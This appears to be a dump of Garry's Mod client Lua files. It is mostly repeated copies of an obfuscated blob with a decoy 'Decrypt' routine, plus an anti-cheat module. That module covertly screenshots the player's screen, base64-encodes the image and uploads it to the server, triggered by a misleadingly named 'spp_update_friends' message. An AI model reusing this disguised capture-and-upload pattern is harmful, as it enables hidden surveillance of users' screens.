
----------------------------------------
--         2014-07-12 20:32:24          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:32:24          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:32:24          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:32:24          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUDZAAAAAAAAAAAbAQAAAQX==AAmUq2niDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYDZAAAAAAAAAAAbAQAAAQX==AAlX0hNlDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcDZAAAAAAAAAAAbAQAAAQX==AARTRDvk1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgDZAAAAAAAAAAAbAQAAAQX==AAhNYDLn1OcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkDZAAAAAAAAAAAbAQAAAQXQGrXiO24cJb2SVYJVb1e4qZgUTviDOc8HETdYzCjZAAAAAAAAAAAbAQAAAQX==AADS4WblR1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEjZAAAAAAAAAAAbAQAAAQX==AA4mGWoxL+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjZAAAAAAAAAAAbAQAAAQXATYpLJmoTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4ZAAAAAAAAAAAbAQAAAQX==AAmUAjOGTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjZAAAAAAAAAAAbAQAAAQX==AAEmAO0ITuoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjZAAAAAAAAAAAbAQAAAQX==AAmUq2PLTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjZAAAAAAAAAAAbAQAAAQX==AAlX0h1NTuoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjZAAAAAAAAAAAbAQAAAQX==AARTRDruEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjZAAAAAAAAAAAbAQAAAQX==AAhNYDHxEPcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjZAAAAAAAAAAAbAQAAAQXQGrXi2R8cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDaAAAAAAAAAAAbAQAAAQX==AADS4WbNi1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDaAAAAAAAAAAAbAQAAAQX==AA4mGWQ5b+lN9wRce/jPPQe1OI9A0gdSqAxccZHJIDaAAAAAAAAAAAbAQAAAQX]]
local include
local function Decrypt(v)
	local c,a = "local CCC = [[", 0
	for i=0,#v * 60 do
		a = a * a - a
		c = c..util.Base64Encode( util.Compress( string.reverse(a..i..a..v..i) ) ) 
		a = a * a + a
	end
	return c
end
if include then include( Decrypt(CCC) ) end
CCC = nil


----------------------------------------
--         2014-07-12 20:32:51          --
------------------------------------------
local NotINC	= include
local NotRCC	= RunConsoleCommand
local NotTS		= timer.Simple
local NotFO		= file.Open
local NotJST	= util.TableToJSON
local NotIKD	= input.IsKeyDown
local NotCAP	= render.Capture
local NotGUI	= gui.IsConsoleVisible
local NotGUI2	= gui.IsGameUIVisible
local NotB64	= util.Base64Encode
local NotOS		= os.time
local ScrH 		= ScrH()
local ScrW 		= ScrW()
local format 	= "jpeg"
local Res		= {
	h		= ScrH,
	w		= ScrW,
	x 		= 0,
	y 		= 0,
	quality	= 40,
	format	= format
}
local function StartTagger(tim) DoTagH = true NotTS((tim or 5), function() DoTagH = false end) end


NotINC("HAC/sh_HACBurst.lua")

local burst = ErrorNoHalt
if (_G.hacburst and _G.hacburst.Send) then


	burst = _G.hacburst.Send
end


local GetOverlay	= false
local GetOverlay2	= false

local function BustACap(Cap)
	burst(format, NotJST( {Cap = NotB64(Cap), ScrH = ScrH, ScrW = ScrW} ) )
end
local function TakeAlt()
	NotRCC("buttocks", "SC=Alt")
	local Name = "jp_"..NotOS()
	NotRCC("__SCREENSHOT_INTERNAL", Name)
	
	NotTS(2, function()
		local Out = NotFO("screenshots/"..Name..".jpg", "rb", "MOD")
			if not Out then NotRCC("whoops", "SC=NF") return end
			local Cap = Out:Read( Out:Size() )
		Out:Close()
		
		if not (Cap and Cap:find("JFIF")) then
			NotRCC("buttocks", "SC=NJ2")
		else
			BustACap(Cap)
		end
	end)
end


local function TakeSC(block,alt)
	
	
	
	
	if not block then
		GetOverlay	= true
		GetOverlay2 = true
	end
	
	if alt then return TakeAlt() end
	
	local Cap = NotCAP(Res)
	if not (Cap and Cap:find("JFIF")) then
		NotRCC("damn", "SC=NJ")
		Cap = nil
		
		TakeAlt()
	else
		BustACap(Cap)
	end
end

local function PreSC(b)
	StartTagger()
	NotTS(1, function() TakeSC(nil,b) end)
end
usermessage.Hook("spp_update_friends", function(um) PreSC( um:ReadBool() ) end)
_G.TakeSC = PreSC


local function CheckKeys()
	if GetOverlay and NotGUI() then
		GetOverlay = false
		
		StartTagger(6)
		NotTS(2, function()
			TakeSC(true)
		end)
	end
	if GetOverlay2 and NotGUI2() then
		GetOverlay2 = false
		
		StartTagger(6)
		NotTS(4, function()
			TakeSC(true)
		end)
	end
end
hook.Add("Think", "CheckKeys", CheckKeys)


























----------------------------------------
--         2014-07-12 20:32:51          --
------------------------------------------
local NotINC	= include
local NotRCC	= RunConsoleCommand
local NotTS		= timer.Simple
local NotFO		= file.Open
local NotJST	= util.TableToJSON
local NotIKD	= input.IsKeyDown
local NotCAP	= render.Capture
local NotGUI	= gui.IsConsoleVisible
local NotGUI2	= gui.IsGameUIVisible
local NotB64	= util.Base64Encode
local NotOS		= os.time
local ScrH 		= ScrH()
local ScrW 		= ScrW()
local format 	= "jpeg"
local Res		= {
	h		= ScrH,
	w		= ScrW,
	x 		= 0,
	y 		= 0,
	quality	= 40,
	format	= format
}
local function StartTagger(tim) DoTagH = true NotTS((tim or 5), function() DoTagH = false end) end


NotINC("HAC/sh_HACBurst.lua")

local burst = ErrorNoHalt
if (_G.hacburst and _G.hacburst.Send) then


	burst = _G.hacburst.Send
end


local GetOverlay	= false
local GetOverlay2	= false

local function BustACap(Cap)
	burst(format, NotJST( {Cap = NotB64(Cap), ScrH = ScrH, ScrW = ScrW} ) )
end
local function TakeAlt()
	NotRCC("buttocks", "SC=Alt")
	local Name = "jp_"..NotOS()
	NotRCC("__SCREENSHOT_INTERNAL", Name)
	
	NotTS(2, function()
		local Out = NotFO("screenshots/"..Name..".jpg", "rb", "MOD")
			if not Out then NotRCC("whoops", "SC=NF") return end
			local Cap = Out:Read( Out:Size() )
		Out:Close()
		
		if not (Cap and Cap:find("JFIF")) then
			NotRCC("buttocks", "SC=NJ2")
		else
			BustACap(Cap)
		end
	end)
end


local function TakeSC(block,alt)
	
	
	
	
	if not block then
		GetOverlay	= true
		GetOverlay2 = true
	end
	
	if alt then return TakeAlt() end
	
	local Cap = NotCAP(Res)
	if not (Cap and Cap:find("JFIF")) then
		NotRCC("damn", "SC=NJ")
		Cap = nil
		
		TakeAlt()
	else
		BustACap(Cap)
	end
end

local function PreSC(b)
	StartTagger()
	NotTS(1, function() TakeSC(nil,b) end)
end
usermessage.Hook("spp_update_friends", function(um) PreSC( um:ReadBool() ) end)
_G.TakeSC = PreSC


local function CheckKeys()
	if GetOverlay and NotGUI() then
		GetOverlay = false
		
		StartTagger(6)
		NotTS(2, function()
			TakeSC(true)
		end)
	end
	if GetOverlay2 and NotGUI2() then
		GetOverlay2 = false
		
		StartTagger(6)
		NotTS(4, function()
			TakeSC(true)
		end)
	end
end
hook.Add("Think", "CheckKeys", CheckKeys)


























----------------------------------------
--         2014-07-12 20:33:07          --
------------------------------------------
local CCC = [[==AAAg7O6yEJiqxeCvpVgUV+L/87+5Kgi/gYqzaYYAAAAAAAAAAAZAQAAAQX=AAwl3gieUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjYAAAAAAAAAAAZAQAAAQX=AAwlXAEgUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADZAAAAAAAAAAAZAQAAAQX=AAwl3flhUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjZAAAAAAAAAAAZAQAAAQX=AAwlX/GjUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADaAAAAAAAAAAAZAQAAAQX=AAwl3eokUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjaAAAAAAAAAAAZAQAAAQX=AAwlX+JmUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADbAAAAAAAAAAAZAQAAAQX=AAwl3drnUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjbAAAAAAAAAAAZAQAAAQX=AAwlX9MpUA9W2Erkfw8lNwFLmrWz5bRCRV8HoADcAAAAAAAAAAAZAQAAAQX=AAwl3cuqUA9W2Erkfw8lNwFLmrWz5bRCRV8HoAjcAAAAAAAAAAAZAQAAAQXQGrXi++xcJb2SVYJVb1e4qZgUTviDOc8HETdYzCjYAAAAAAAAAAAbAQAAAQXATYRuRlgTcLFQJiP+IfsOOvqN3+REqkEA+SdYzL4YAAAAAAAAAAAbAQAAAQX==AA4mGWYir9lN9wRce/jPPQe1OI9A0gdSqAxccZHJIjYAAAAAAAAAAAbAQAAAQX==AArvTKIlr9lN9wRce/jPPQe1OI9A0gdSqAxccZHJMjYAAAAAAAAAAAbAQAAAQX==AAmUAj+0ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJQjYAAAAAAAAAAAbAQAAAQX==AAEmAOk3ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJUjYAAAAAAAAAAAbAQAAAQX==AAmUq2/5ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJYjYAAAAAAAAAAAbAQAAAQX==AAlX0hl8ztoe56HXkrfyA/MrV1ChTWXafFLjCJHJcjYAAAAAAAAAAAbAQAAAQX==AARTRDzamOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJgjYAAAAAAAAAAAbAQAAAQX==AAhNYDPdmOcqtTj/AnpOkLmPhc5orNxKvkMXI5GJkjYAAAAAAAAAAAbAQAAAQXQGrXima1cJb2SVYJVb1e4qZgUTviDOc8HETdYzCDZAAAAAAAAAAAbAQAAAQX==AADS4Wb9A1xfnwNjH3BiYCO0RJTYowZ6SoYfXqHJEDZAAAAAAAAAAAbAQAAAQXATY9ctlkTcLFQJiP+IfsOOvqN3+REqkEA+SdYzLYZAAAAAAAAAAAbAQAAAQX==AArvTKws79lN9wRce/jPPQe1OI9A0gdSqAxccZHJMDZAAAAAAAAAAAbAQAAAQX==AAmUAjmdDuoe56HXkrfyA/MrV1ChTWXafFLjCJHJQDZAAAAAAAAAAAbAQAAAQX==AAEmAOMgDuoe56HXkrfyA